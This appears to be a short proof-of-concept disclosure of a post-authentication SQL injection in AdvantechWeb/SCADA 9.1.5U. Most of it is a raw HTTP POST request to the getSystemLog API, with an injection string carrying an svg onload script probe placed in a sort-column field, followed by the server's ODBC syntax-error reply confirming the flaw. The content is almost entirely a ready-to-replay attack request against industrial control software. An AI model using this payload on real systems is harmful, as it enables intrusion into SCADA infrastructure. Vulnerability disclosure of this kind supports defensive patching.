;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U ;; ;; found: 28.12.2023 ;; ;; more: ;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html ;; POST /waconfig/api/odbc/getSystemLog HTTP/2 Host: 192.168.56.106 Cookie: serverLanguage=en; csrfToken=a2db29e5-68f5-4cae-917c-41767ee92911-1837; pcname=MSEDGEWIN10; rpcPort=4592; accessCode=qweqwe; socketPort=14592; account=admin; ASPSESSIONIDQWBDCRDA=MCKNMBPCPEFMMGDHFCIICAGA; ASPSESSIONIDQSBDCRDA=NCKNMBPCOGIENOGNONBOFBFF; ASP.NET_SessionId=zgqgjalvaa0x1kpcdj3ke2di; user=name=; ASPSESSIONIDCGTAATDA=OCEJBDPCJIJLPKAFFGOGHPAN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: application/json, text/plain, */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/json;charset=utf-8 Content-Length: 359 Origin: https://192.168.56.106 Referer: https://192.168.56.106/waconfig/index Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: keep-alive {"csrfToken":"a2db29e5-68f5-4cae-917c-41767ee92911-1837","StartDateTime":"12/28/2023 00:00:00","EndDateTime":"12/28/2023 22:20:46","Action":[2,3,4,5,6,7,8,9,10,11,13,14,15,16,12],"UserName":"ALL","IPAddress":"ALL","NodeName":"ALL","ProjName":"ALL","Orders":[{"ColumnName":"%27>%22><svg/onload=prompt(123)>","descending":"DESC"}],"PageSize":50,"CurrentPage":1} resp: HTTP/2 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 225 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 X-Ua-Compatible: IE=EmulateIE7 Access-Control-Allow-Origin: http://localhost:8080 Access-Control-Allow-Methods: GET,POST,OPTIONS Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Credentials: true Strict-Transport-Security: max-age=31536000;includeSubDomains;preload X-Content-Type-Options: nosniff Date: Thu, 28 Dec 2023 21:29:56 GMT {"error":-500,"reason":"Exception captured by WebApiExceptionFilter: ERROR [42000] [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression \u0027%27\u003e%22\u003e\u003csvg/onload=prompt(123)\u003e\u0027."} ;; cheers ;;
{{ x.nick }}
| Date:{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |